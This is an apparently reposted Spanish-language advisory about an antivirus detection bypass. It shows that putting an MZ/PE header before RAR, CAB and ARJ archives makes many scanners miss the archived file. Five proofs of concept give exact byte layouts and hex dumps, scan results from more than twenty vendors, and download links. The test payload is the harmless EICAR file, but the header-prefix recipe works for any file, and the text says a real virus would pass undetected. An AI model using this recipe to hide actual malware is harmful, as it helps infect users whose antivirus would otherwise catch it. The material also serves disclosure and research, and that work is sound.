Multiple Antivirus detection bypass!

Testeteado con: Jotti Online Antivirus Scanner
Testeado con: VirusTotal Online Antivirus Scanner
Testeado con: PowerZip v7.06
Testeado con: Command line freeware UnRAR v3.50

Productos Afectados:
* Kaspersky Antivirus
* BitDefender Antivirus
* NOD32 Antivirus
* F-Prot Antivirus
* Avast Antivirus
* McAfee Antivirus
* Sophos Antivirus
* Symantec Antivirus
* Dr.Web Antivirus
* Avira Antivirus
* Norman Virus Control Antivirus
* Fortinet Antivirus
* VBA32 Antivirus
* Rising Antivirus
* AntiVir Antivirus
* eTrust-Iris Antivirus
* ArcaVir Antivirus
* eTrust-Vet Antivirus
* UNA Antivirus
* Ikarus AntiVirus
* ClamAV Antivirus
* Panda Antivirus
* CAT Quick Heal
* TheHacker
* otros..

No afectado:
* Grisoft AVG AntiVirus

Analisis:

Scanning EICAR.zip ... <- (eicar.com esta adentro)

[0x00000016]
[-] Writing local header patch [0x0000007F]

File scanning finished. EOF:16 ERR:0

Explorando Archivos:

X:\=>Master Boot Record 80 OK
X:\=>Partition Boot 1 (primary) (active) OK
X:\=>Master Boot Record 81 OK
X:\=>Partition Boot 1 (primary) OK
X:\SecuBox.Labs\Debug\EICAR.zip OK
X:\SecuBox.Labs\Debug\EICAR.zip=>EICAR.com Infected EICAR-Test-File (not a virus)
X:\SecuBox.Labs\EICAR.zip=>EICAR.com Deleted
X:\SecuBox.Labs\EICAR.zip Update

Analizando...:
Un archivo especialmente fabricado que contiene un virus pasará a través del sistema del antivirus sin ser detectado.El contenido malicioso puenteado no plantea un riesgo hasta ser extraído del fichero de archivo de RAR.En ese caso el contenido malicioso será detectado y eliminado por el Antivirus.
Contrariamente a Winzip o a BitZipper que no autorizan la abertura del archivo, Winrar y PowerZip si lo hacen.

posibles formatos:

Código:

/------------------------------------------------------------\
*.RAR, *.ZIP, *.CAB, *.ARJ, *.LZH, *.ACE, *.TAR, *.GZ (GZIP)
*.UUE, *.BZ2, *.JAR, *.ISO, *.7Z, *.Z
\------------------------------------------------------------/

Prueba de Concepto:
Para la prueba se utiliza el archivo ¨eicar.com¨ que es detectado como virus.
Comprimimos el archivo con WinRar:eicar.rar

Código:

=====================================================================-
00h: 52 61 72 21 1A 07 00 CF 90 73 00 00 0D 00 00 00 ; Rar!...Ïs......
10h: 00 00 00 00 D3 AD 74 20 90 2E 00 44 00 00 00 44 ; ....Ót ..D...D
20h: 00 00 00 02 3C CF 51 68 EE A4 45 33 1D 30 09 00 ; ....<ÏQhî€E3.0..
30h: 20 00 00 00 45 49 43 41 52 2E 63 6F 6D 00 F0 A0 ; ...EICAR.com.ð
40h: CB 96 58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A ; ËX5O!P%@AP[4\PZ
50h: 58 35 34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 ; X54(P^)7CC)7}$EI
60h: 43 41 52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 ; CAR-STANDARD-ANT
70h: 49 56 49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 ; IVIRUS-TEST-FILE
80h: 21 24 48 2B 48 2A C4 3D 7B 00 40 07 00 ; !$H+H*Ä={.@..
-=====================================================================-

Código:

-=====================================================================-
Archive is correct :: No errors found during test operation
-=====================================================================-
UNRAR 3.50 freeware - Copyright (c) 1993-2004 Alexander Roshal
Extracting from SecuBox_AVPoC2.rar
Extracting EICAR.com OK
All OK

UNRAR 3.50 freeware - Copyright (c) 1993-2004 Alexander Roshal
Testing archive SecuBox_AVPoC2.rar
Testing EICAR.com OK
All OK

Nota:Para PowerZip, solamente SecuBox_AVPoC2.rar es válido, no la PC n°1.

prueba de Concepto Nº 1

Código:

--------------------
[e_magic][archive] >> Like this >> [4D5A][526172211A0700...]

Resultado para: SecuBox_AVPoC1.rar

[?] AntiVir Found nothing
[?] ArcaVir Found nothing
[?] Avast Found nothing
[!] AVG Antivirus Found EICAR_Test (+187)
[!] BitDefender Found EICAR-Test-File (not a virus)
[!] CAT-QuickHeal Found Eicar.Test
[~] ClamAV Found nothing >> Suspect
[?] Dr.Web Found nothing
[?] eTrust-Iris Found nothing
[?] eTrust-Vet Found nothing
[!] Fortinet Found EICAR_TEST_FILE
[?] F-Prot Antivirus Found nothing
[!] Ikarus Found EICAR_Test
[?] Kaspersky Anti-Virus Found nothing
[?] McAfee Found nothing
[?] NOD32 Found nothing
[?] Norman Virus Control Found nothing
[!] Panda Found Eicar.Mod
[?] Sophos Found nothing
[?] Symantec Found nothing
[?] TheHacker Found nothing
[?] UNA Found nothing
[?] VBA32 Found nothing

Download prueba de concepto Nº1:
http://shadock.net/secubox/demo/SecuBox_AVPoC1.rar
MD5: e907ab569a6ceed6233e33828032c8f4
SHA1: 071ba79957b80b11b85bb05bdf00f2edb803f4bb

Prueba de Concepto Nº2

Código:

[e_magic] [e_cblp] [e_cp] [00+archive...]
( 4D5A ) ( 5000 ) (0200) (00+52 61 72 21 1A 07 00 CF....

Resultado:
[?] AntiVir Found nothing
[!] ArcaVir Found Eicar.Test
[!] Avast Found EICAR Test-NOT!!
[?] Avira Found nothing
[!] AVG Antivirus Found EICAR_Test
[?] BitDefender Found nothing
[!] CAT-QuickHeal Found Eicar.Test
[~] ClamAV Found nothing >> Suspect
[?] Dr.Web Found nothing
[?] eTrust-Iris Found nothing
[?] eTrust-Vet Found nothing
[?] Fortinet Found nothing
[?] F-Prot Antivirus Found nothing
[?] Fortinet Found nothing
[!] Ikarus Found EICAR_Test
[?] Kaspersky Anti-Virus Found nothing
[?] McAfee Found nothing
[?] NOD32 Found nothing
[?] Norman Virus Control Found nothing
[!] Panda Found Eicar.Mod
[!] Sophos EICAR-AV-Test
[?] Symantec Found nothing
[?] TheHacker Found nothing
[?] Trustix Antivirus Found nothing
[?] UNA Found nothing
[?] VBA32 Found nothing

Download Prueba de Concepto Nº 2
http://shadock.net/secubox/demo/SecuBox_AVPoC2.rar
MD5: 757e6c7984028653c557d5b0bf5374fd
SHA1: 438d119bae0eedca413f27958172523738889c75

Prueba de Concepto Nº 3

Código:

[e_magic] [e_cblp] [e_cp] [00+archive...]
( 4D5A ) ( 5000 ) (0200) (00+4D 53 43 46 00 00 00 00....

Comprimimos el archivo"eicar.com" con PowerZip: eicar.cab
-=====================================================================-
00h: 4D 53 43 46 00 00 00 00 96 00 00 00 00 00 00 00 ; MSCF...........
10h: 2C 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 ; ,...............
20h: 29 00 00 00 46 00 00 00 01 00 01 00 44 00 00 00 ; )...F.......D...
30h: 00 00 00 00 00 00 47 33 F9 86 20 00 45 49 43 41 ; ......G3ù .EICA
40h: 52 2E 63 6F 6D 00 60 79 2E 6A 48 00 44 00 43 4B ; R.com.`y.jH.D.CK
50h: 8B 30 F5 57 0C 50 75 70 0C 88 36 89 09 88 8A 30 ; 0õW.Pup.6.0
60h: 35 D1 08 88 D3 34 77 76 D6 34 AF 55 71 F5 74 76 ; 5Ñ.Ó4wvÖ4¯Uqõtv
70h: 0C D2 0D 0E 71 F4 73 71 0C 72 D1 75 F4 0B F1 0C ; .Ò..qôsq.rÑuô.ñ.
80h: F3 0C 0A 0D D6 0D 71 0D 0E D1 75 F3 F4 71 55 54 ; ó...Ö.q..ÑuóôqUT
90h: F1 D0 F6 D0 02 00 ; ñÐöÐ..
-===================================================================

Resultado para: SecuBox_AVPoC3.cab
[?] AntiVir Found nothing
[?] ArcaVir Found nothing
[?] Avast Found nothing
[?] Avira Found nothing
[!] AVG Antivirus Found EICAR_Test
[?] BitDefender Found nothing
[?] CAT-QuickHeal Found nothing
[?] ClamAV Found nothing
[?] Dr.Web Found nothing
[?] eTrust-Iris Found nothing
[?] eTrust-Vet Found nothing
[?] Fortinet Found nothing
[?] F-Prot Antivirus Found nothing
[?] Fortinet Found nothing
[?] Ikarus Found nothing
[?] Kaspersky Anti-Virus Found nothing
[?] McAfee Found nothing
[?] NOD32 Found nothing
[?] Norman Virus Control Found nothing
[?] Panda Found nothing
[?] Sophos Found nothing
[?] Symantec Found nothing
[?] TheHacker Found nothing
[?] Trustix Antivirus Found nothing
[?] UNA Found nothing
[!] VBA32 Found EICAR-Test-File

Download Prueba de Concepto Nº 3
http://shadock.net/secubox/demo/SecuBox_AVPoC3.cab
MD5: 621990887beb0cbca7a071d3006a7fdf
SHA1: 3edd5b71eaa803d6cdffc181ceaaf9ad9b85cf31

Prueba de Concepto Nº 4

Código:

[e_magic] [e_cblp] [e_cp] [00+archive...]
( 4D5A ) ( 5000 ) (0200) (00+60 EA 29 00 22 66 01 0B....

Comprimimos el archivo"eicar.com" con arj32: eicar.arj
-=====================================================================-
00h: 60 EA 29 00 22 66 01 0B 10 00 02 C2 C2 02 48 33 ; `ê)."f......H3
10h: C2 02 48 33 00 00 00 00 00 00 00 00 00 00 00 00 ; .H3............
20h: 00 00 00 00 00 00 30 2E 61 72 6A 00 00 56 C5 F3 ; ......0.arj..VÅó
30h: 64 00 00 60 EA 39 00 2E 66 01 0B 10 00 00 C2 F9 ; d..`ê9..f.....ù
40h: 86 47 33 44 00 00 00 44 00 00 00 3C CF 51 68 00 ; G3D...D...<ÏQh.
50h: 00 20 00 00 00 00 00 00 00 37 02 48 33 BD 86 47 ; . .......7.H3œG
60h: 33 44 00 00 00 45 49 43 41 52 2E 63 6F 6D 00 00 ; 3D...EICAR.com..
70h: 2A BE FE 4B 00 00 58 35 4F 21 50 25 40 41 50 5B ; *ŸþK..X5O!P%@AP[
80h: 34 5C 50 5A 58 35 34 28 50 5E 29 37 43 43 29 37 ; 4\PZX54(P^)7CC)7
90h: 7D 24 45 49 43 41 52 2D 53 54 41 4E 44 41 52 44 ; }$EICAR-STANDARD
a0h: 2D 41 4E 54 49 56 49 52 55 53 2D 54 45 53 54 2D ; -ANTIVIRUS-TEST-
b0h: 46 49 4C 45 21 24 48 2B 48 2A 60 EA 00 00 ; FILE!$H+H*`ê..
-=====================================================================-

Resultado para: SecuBox_AVPoC4.arj
[?] AntiVir Found nothing
[?] ArcaVir Found nothing
[!] Avast Found EICAR Test-NOT!!
[?] Avira Found nothing
[!] AVG Antivirus Found EICAR_Test
[?] BitDefender Found nothing
[!] CAT-QuickHeal EICAR Test File
[?] ClamAV Found nothing
[?] DrWeb Found nothing
[?] eTrust-Iris Found nothing
[?] eTrust-Vet Found nothing
[?] F-Prot Antivirus Found nothing
[?] Fortinet Found nothing
[!] Ikarus EICAR-ANTIVIRUS-TESTFILE
[?] Kaspersky Antivirus Found nothing
[?] McAfee Found nothing
[?] NOD32 Found nothing
[?] Norman Virus Control Found nothing
[!] Panda Eicar.Mod
[!] Sophos EICAR-AV-Test
[?] Symantec Found nothing
[?] TheHacker Found nothing
[?] Trustix Antivirus Found nothing
[?] UNA Found nothing
[!] VBA32 Found nothing

Download prueba de Concepto Nº 4
http://shadock.net/secubox/demo/SecuBox_AVPoC4.arj
MD5: 6a2c388adc64f3d40c95c9e1962e3529
SHA1: 34c965c06f920ee7b63d3ae12ddec50a3f5dc413

Prueba de Concepto Nº 5

Código:

[00+archive...]
00+60 EA 29 00 22 66 01 0B....

Comprimimos el archivo"eicar.com" con arj32: eicar.arj
-========================================
00h: 60 EA 29 00 22 66 01 0B 10 00 02 C2 C2 02 48 33 ; `ê)."f......H3
10h: C2 02 48 33 00 00 00 00 00 00 00 00 00 00 00 00 ; .H3............
20h: 00 00 00 00 00 00 30 2E 61 72 6A 00 00 56 C5 F3 ; ......0.arj..VÅó
30h: 64 00 00 60 EA 39 00 2E 66 01 0B 10 00 00 C2 F9 ; d..`ê9..f.....ù
40h: 86 47 33 44 00 00 00 44 00 00 00 3C CF 51 68 00 ; G3D...D...<ÏQh.
50h: 00 20 00 00 00 00 00 00 00 37 02 48 33 BD 86 47 ; . .......7.H3œG
60h: 33 44 00 00 00 45 49 43 41 52 2E 63 6F 6D 00 00 ; 3D...EICAR.com..
70h: 2A BE FE 4B 00 00 58 35 4F 21 50 25 40 41 50 5B ; *ŸþK..X5O!P%@AP[
80h: 34 5C 50 5A 58 35 34 28 50 5E 29 37 43 43 29 37 ; 4\PZX54(P^)7CC)7
90h: 7D 24 45 49 43 41 52 2D 53 54 41 4E 44 41 52 44 ; }$EICAR-STANDARD
a0h: 2D 41 4E 54 49 56 49 52 55 53 2D 54 45 53 54 2D ; -ANTIVIRUS-TEST-
b0h: 46 49 4C 45 21 24 48 2B 48 2A 60 EA 00 00 ; FILE!$H+H*`ê..
-=======================================

Resultado para: SecuBox_AVPoC5.arj
[?] AntiVir Found nothing
[?] ArcaVir Found nothing
[!] Avast Found EICAR Test-NOT!!
[?] Avira Found nothing
[?] AVG Antivirus Found nothing
[?] BitDefender Found nothing
[!] CAT-QuickHeal EICAR Test File
[?] ClamAV Found nothing
[?] Dr.Web Found nothing
[?] eTrust-Iris Found nothing
[?] eTrust-Vet Found nothing
[?] Fortinet Found nothing
[?] F-Prot Found nothing
[?] Fortinet Found nothing
[!] Ikarus EICAR-ANTIVIRUS-TESTFILE
[!] Kaspersky Antivirus Found EICAR-Test-File
[?] McAfee Found nothing
[?] NOD32 Found nothing
[?] Norman Virus Control Antivirus Found nothing
[?] UNA Found nothing
[!] Panda Eicar.Mod
[?] Sophos Found nothing
[?] Symantec Found nothing
[?] TheHacker Found nothing
[!] Trustix Antivirus EICAR-Test-File
[!] VBA32 Found EICAR-Test-File

Download prueba de Concepto Nº 5
http://shadock.net/secubox/demo/SecuBox_AVPoC5.arj
MD5: c5868728023a87a49cc1c11907879a28
SHA1: e25fbf7e5c7841ae7dd7253e5158d3878ebe36e2

fuente:packetstorm.linuxsecurity.com

Salu2